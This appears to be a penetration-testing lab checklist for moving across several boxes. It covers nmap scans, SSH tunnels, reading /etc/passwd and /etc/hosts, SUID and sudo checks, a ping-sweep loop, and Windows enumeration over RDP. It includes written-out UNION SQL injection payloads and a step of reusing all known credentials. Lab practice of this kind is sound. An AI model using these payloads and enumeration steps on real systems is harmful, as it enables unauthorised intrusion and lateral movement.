- Nmap scan first box
- Run nmap scripts
- check for robots.txt
- SSH tunnel to web port
- /etc/passwd - take note of users
- /etc/hosts - network enum
- /etc/networks - network enum
- /etc/group - group information
- must be able to access upload location
- prep a login
- hit F12, look in the Network tab
- login
- Copy RAW into the search bar to perform GET injection
- open browser source code.
SSH to box one
sudo -l
crontab
find / -type f -perm /4000 -ls 2> /dev/null
-
Ping sweep enumerated network
for i in {1..254}; do ( ping -c 1 <targetnetwork>.$i | grep "bytes from" &); done
-
Nmap scan found boxes
-
Nmap Scripts to enum
-
Tunnel to web port
-
click around to understand how the SQL works.
-
In search bar perform GET SQL injection
UNION select table_schema,column_name,table_name from information_schema.columns; UNION SELECT table_name,1,column_name FROM information_schema.columns; @@version
ssh into box two
SSH into box - use all known creds
Bash
cat /etc/passwd
cat /etc/hosts
sudo -l
find / -type f -perm /4000 -ls 2> /dev/null
arp -a
for i in {1..254}; do ( ping -c 1 <targetnetwork>.$i | grep "bytes from" &); done
nmap box four, nmap scripts
xfreerdp - Windows box with port 3389
net group
net users
whoami
net localgroup
### gui ###
regedit
run
runonce
services
schtasks